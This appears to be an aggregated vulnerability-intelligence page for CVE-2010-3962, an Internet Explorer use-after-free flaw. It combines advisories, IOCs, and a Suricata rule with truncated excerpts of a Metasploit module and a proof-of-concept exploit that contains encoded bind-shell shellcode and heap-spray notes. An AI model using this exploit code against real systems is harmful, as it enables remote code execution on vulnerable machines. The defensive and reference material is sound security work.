CVE-2010-3962
published 2010-11-05
CVE-2010-3962: Use-after-free vulnerability in Microsoft Internet Explorer 6, 7, and 8 allows remote attackers to execute arbitrary code via vectors related to Cascading…
Priority: P186 · high · 8.1 · CVSS 3.1
AV:N · AC:H · PR:N · UI:N · S:U · C:H · I:H · A:H
KEV · ITW · EXPLOIT
CISA Known Exploited Vulnerability · due 2025-10-27
Exploited in the wild
EPSS: 96.89% (99.9th percentile)
Use-after-free vulnerability in Microsoft Internet Explorer 6, 7, and 8 allows remote attackers to execute arbitrary code via vectors related to Cascading Style Sheets (CSS) token sequences and the clip attribute, aka an "invalid flag reference" issue or "Uninitialized Memory Corruption Vulnerability," as exploited in the wild in November 2010.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | internet_explorer | — | — |
| microsoft | internet_explorer | — | — |
| microsoft | internet_explorer | — | — |
Detection & IOCs
- Exploit combines CVE-2010-0806 and CVE-2010-3962 in a single HTML/JS page; look for heap spray patterns using repeated '%u0d0d%u0d0d' NOP sleds alongside CSS clip attribute manipulation in the same document.
- Exploit delivery involves obfuscated JavaScript (.js) loaded from the same malicious domain as the HTML page; detect co-loading of obfuscated JS from newly-registered or low-reputation domains alongside CSS token sequences.
- The exploit targets mshtml.dll via a specially crafted CSS tag with the clip attribute; monitor for iexplore.exe crashes or abnormal child process spawning from iexplore.exe on IE 6/7/8.
- The vtable corruption causes EIP to land at [vtable+0x30+1]; the exact landing address is mshtml.dll version-dependent. Heap spray targets 0x0d0d0d0d; alert on large allocations of repeated 0x0d0d0d0d patterns in browser process memory.
- Shellcode opens a bind shell on TCP port 4444; monitor for iexplore.exe listening on or connecting to port 4444.
- Hosting multiple malicious domains on one IP is common; pivot on the IP of dxcdfghg.com to identify co-hosted malicious infrastructure.
- The Metasploit module only has working return addresses for IE6 and IE7; IE8 targets are commented out as non-functional, meaning the module will not reliably exploit IE8 despite the CVE affecting it.
- The exploit return address is not attacker-controlled and is entirely dependent on the loaded mshtml.dll version; some versions land EIP in non-exploitable regions (kernel space, another module), making exploitation version-sensitive.
- DEP/ASLR bypass is not implemented in the public PoC exploit; ROP-based bypass is also noted as unlikely due to the non-controllable program counter value.
- The public PoC exploit (exploit-db 15421) is described as 'quick and dirty' with no DEP/ASLR bypass; heap spray allocation sizes are hardcoded per mshtml.dll version and must be adjusted for other versions.
CVSS provenance
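| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 8.1 | HIGH | CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 9.3 | CRITICAL | AV:N/AC:M/Au:N/C:C/I:C/A:C |
| vulncheck | — | 8.1 | HIGH | — |
| cisa | — | 8.1 | HIGH | — |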
GHSA
GHSA-cmh7-cfjq-p92g: Use-after-free vulnerability in Microsoft Internet Explorer 6, 7, and 8 allows remote attackers to execute arbitrary code via vectors related to Casca
ghsa_unreviewed·2022-05-13
CVE-2010-3962 [HIGH] CWE-416 GHSA-cmh7-cfjq-p92g: Use-after-free vulnerability in Microsoft Internet Explorer 6, 7, and 8 allows remote attackers to execute arbitrary code via vectors related to Casca
Use-after-free vulnerability in Microsoft Internet Explorer 6, 7, and 8 allows remote attackers to execute arbitrary code via vectors related to Cascading Style Sheets (CSS) token sequences and the clip attribute, aka an "invalid flag reference" issue or "Uninitialized Memory Corruption Vulnerability," as exploited in the wild in November 2010.
VulnCheck
Microsoft Internet Explorer Uninitialized Memory Corruption Vulnerability
vulncheck·2010·CVSS 8.1
CVE-2010-3962 [HIGH] Microsoft Internet Explorer Uninitialized Memory Corruption Vulnerability
Microsoft Internet Explorer contains an uninitialized memory corruption vulnerability that could allow for remote code execution. The impacted product could be end-of-life (EoL) and/or end-of-service (EoS). Users should discontinue product utilization.
Affected: Microsoft Internet Explorer
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Exploitation References: https://www.cve.org/CVERecord?id=CVE-2010-3962; https://web.archive.org/web/20160910124439/http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong; https://symantec-enterprise-blogs.secur
CISA
Microsoft Internet Explorer Uninitialized Memory Corruption Vulnerability
cisa·2025-10-06·CVSS 8.1
CVE-2010-3962 [HIGH] Microsoft Internet Explorer Uninitialized Memory Corruption Vulnerability
Vulnerability: Microsoft Internet Explorer Uninitialized Memory Corruption Vulnerability
Affected: Microsoft Internet Explorer
Microsoft Internet Explorer contains an uninitialized memory corruption vulnerability that could allow for remote code execution. The impacted product could be end-of-life (EoL) and/or end-of-service (EoS). Users should discontinue product utilization.
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Notes: https://learn.microsoft.com/en-us/security-updates/SecurityAdvisories/2010/2458511?redirectedfrom=MSDN ; https://nvd.nist.gov/vuln/detail/CVE-2010-3962
Remediation Due Date: 2025-10-27
Suricata
ET WEB_CLIENT Microsoft IE CSS Clip Attribute Memory Corruption (POC SPECIFIC)
suricata·2010-11-05
CVE-2010-3962 ET WEB_CLIENT Microsoft IE CSS Clip Attribute Memory Corruption (POC SPECIFIC)
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET WEB_CLIENT Microsoft IE CSS Clip Attribute Memory Corruption (POC SPECIFIC)"; flow:established,to_client; file.data; content:"position|3A|absolute|3B|"; content:"clip|3A|"; within:20; content:"rect|28|0|29|"; fast_pattern; within:20; reference:url,extraexploit.blogspot.com/2010/11/cve-2010-3962-yet-another-internet.html; reference:url,www.symantec.com/connect/blogs/new-ie-0-day-used-targeted-attacks; reference:url,blog.fireeye.com/research/2010/11/ie-0-day-hupigon-joins-the-party.html; reference:url,www.offensive-security.com/0day/ie-0day.txt; reference:url,www.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/windows/browser
Exploit-DB
Microsoft Internet Explorer - CSS SetUserClip Memory Corruption (MS10-090) (Metasploit)
exploitdb·2011-01-20
CVE-2010-3962 Microsoft Internet Explorer - CSS SetUserClip Memory Corruption (MS10-090) (Metasploit)
---
##
# $Id: ms10_090_ie_css_clip.rb 11610 2011-01-20 19:30:59Z egypt $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 HttpClients::IE,
:ua_minver => "6.0",
:ua_maxver => "7.0",
:javascript => true,
:os_name => OperatingSystems::WINDOWS,
:vuln_test => nil, # no way to test without just trying it
})
def initialize(info = {})
super(update_info(info,
'Name' => 'Internet Explorer CSS SetUserClip Memory Corruption',
'Description' => %q{
Thie module exploits
Exploit-DB
Microsoft Internet Explorer 6/7/8 - Memory Corruption
exploitdb·2010-11-04·CVSS 8.1
CVE-2010-3962 [HIGH] Microsoft Internet Explorer 6/7/8 - Memory Corruption
---
# Internet Explorer Memory Corruption 0day Vulnerability CVE-2010-3962
# Tested on Windows XP SP3 IE6 IE7 IE8
# Coded by Matteo Memelli ryujin __at__ offsec.com
# http://www.offensive-security.com/0day/ie-0day.txt
# Thx to dookie __at__ offsec.com
# notes : This is a quick and dirty exploit! No DEP/ASLR bypass here feel free to improve it
poc CVE-2010-3962 zeroday
function alloc(bytes, mystr) {
// Bindshell on port 4444
var shellcode = unescape('%u9090%u9090%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b%u8b30%u0c52%u528b'+
'%u8b14%u2872%ub70f%u264a%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf0e2%u5752%u528b'+
'%u8b10%u3c42%ud001%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18%u2058%ud301%u3ce3%u8b49%u8b34'+
'%ud601%uff31%uc031%uc1a
Exploit-DB
Microsoft Internet Explorer - Memory Corruption
exploitdb·2010-11-04
CVE-2010-3962 Microsoft Internet Explorer - Memory Corruption
---
Metasploit
MS10-090 Microsoft Internet Explorer CSS SetUserClip Memory Corruption
metasploit
This module exploits a memory corruption vulnerability within Microsoft's HTML engine (mshtml). When parsing an HTML page containing a specially crafted CSS tag, memory corruption occurs that can lead to arbitrary code execution. It seems like Microsoft code inadvertently increments a vtable pointer to point to an unaligned address within the vtable's function pointers. This leads to the program counter being set to the address determined by the address "[vtable+0x30+1]". The particular address depends on the exact version of the mshtml library in use. Since the address depends on the version of mshtml, some versions may not be exploitable. Specifically, those ending up with a program counter value within another module,
Zscaler
Memory Corruption Vulnerabilities Target IE 6 & 7 | Blog
blogs_zscaler·2011-07-14·CVSS 9.3
[CRITICAL] Memory Corruption Vulnerabilities Target IE 6 & 7 | Blog
Recorded Future
Tracking the Clandestine Fox
blogs_recorded_future·CVSS 8.1
CVE-2014-1776 [HIGH] Tracking the Clandestine Fox
## Tracking the Clandestine Fox
## Analysis Summary
FireEye Research Labs reports targeted attacks using a new IE zero-day against defense and financial services.
Early details on malware in the wild and threat actor behind it are slight.
FireEye links to Pirpi provide an interesting clue, while Websense analysis of IE crashes points in a different direction.
## The Vulnerability: Internet Explorer CVE-2014-1776
Last Saturday, FireEye Research Labs flagged an Internet Explorer (IE) zero-day being actively exploited in targeted attacks. This Microsoft Internet Explorer vulnerability, CVE-2014-1776, broadly impacts IE versions from 6 through 11, and is trending strongly in open source.
CVE-2014-1776 is the highest profile vulnerability yet to hit Windows XP, which recently passed ou
Zscaler
Zscaler found Multiple Security Vulnerabilities | 12-14-2010
blogs_zscaler·CVSS 9.3
[CRITICAL] Zscaler found Multiple Security Vulnerabilities | 12-14-2010
Zscaler
Zscaler Provides Protection for Critical IE Vulnerabilities
blogs_zscaler
Recorded Future
October 2025 CVE Landscape
blogs_recorded_future·CVSS 9.8
[CRITICAL] October 2025 CVE Landscape
# October 2025 CVE Landscape: 32 High-Impact Vulnerabilities Demand Immediate Attention
October 2025 saw a significant escalation in vulnerability activity, with Recorded Future's Insikt Group® identifying 32 high-impact vulnerabilities, double the 16 identified in September's CVE report. Twenty-six of these vulnerabilities scored as Very Critical.
What security teams need to know:
- Microsoft dominates: Eight of 32 vulnerabilities affect Microsoft products, including a critical WSUS deserialization flaw (CVE-2025-59287) now being actively exploited
- CL0P ransomware group exploited an Oracle E-Business Suite zero-day (CVE-2025-61882) for data theft and extortion campaigns
- Legacy vulnerabilities persist: Five of the 14 RCE-enabling vulnerabilities are over a decade old, highlighting c
arXiv
Investigation of Advanced Persistent Threats Network-based Tactics, Techniques and Procedures
arxiv_fulltext·2025-02-12
Almuthanna Alageel and Sergio Maffeis
Department of Computing, Imperial College London, London, United Kingdom
## Abstract
The scarcity of data and the high complexity of Advanced Persistent Threats (APTs) attacks have created challenges in comprehending their behavior and hindered the exploration of effective detection techniques.
To create an effective APT detection strategy, it is important to examine the Tactics, Techniques, and Procedures (TTPs) that have been reported by the industry. These TTPs can be difficult to classify as either malicious or legitimate. When developing an approach for the next generation of network intrusion detection systems (NIDS), it is necessary to
Bugzilla
CVE-2008-7258 Ssmtp: Buffer overflow by cutting '\n' sequence from lines with leading dot
bugzilla·2010-07-26·CVSS 2.6
CVE-2008-7258 [LOW] CVE-2008-7258 Ssmtp: Buffer overflow by cutting '\n' sequence from lines with leading dot
Brendan Boerner reported:
[1] https://bugs.launchpad.net/ubuntu/+source/ssmtp/+bug/282424
a deficiency in the way ssmtp removed trailing '\n' sequence
by processing lines beginning with a leading dot. A local user,
could send a specially-crafted e-mail message via ssmtp send-only
sendmail emulator, leading to ssmtp executable denial of service (exit with:
ssmtp: standardise() -- Buffer overflow). Different vulnerability
than CVE-2008-3962.
References:
[2] https://bugzilla.redhat.com/show_bug.cgi?id=582236
[3] https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2008-3962
[4] http://patch-tracker.debian.org/package/ssmtp/2.62-3
[5] http://lists.fedoraproject.org/pipermail/package-announce/2010-May/041012
- http://blogs.technet.com/b/msrc/archive/2010/11/02/microsoft-releases-security-advisory-2458511.aspx
- http://secunia.com/advisories/42091
- http://www.exploit-db.com/exploits/15418
- http://www.exploit-db.com/exploits/15421
- http://www.kb.cert.org/vuls/id/899748
- http://www.microsoft.com/technet/security/advisory/2458511.mspx
- http://www.securityfocus.com/bid/44536
- http://www.securitytracker.com/id?1024676
- http://www.symantec.com/connect/blogs/new-ie-0-day-used-targeted-attacks
- http://www.us-cert.gov/cas/techalerts/TA10-348A.html
- http://www.vupen.com/english/advisories/2010/2880
- https://docs.microsoft.com/en-us/security-updates/securitybulletins/2010/ms10-090
- https://exchange.xforce.ibmcloud.com/vulnerabilities/62962
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A12279
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2010-3962
2010-11-05: Published
2025-10-06: Added to CISA KEV
Exploited in the wild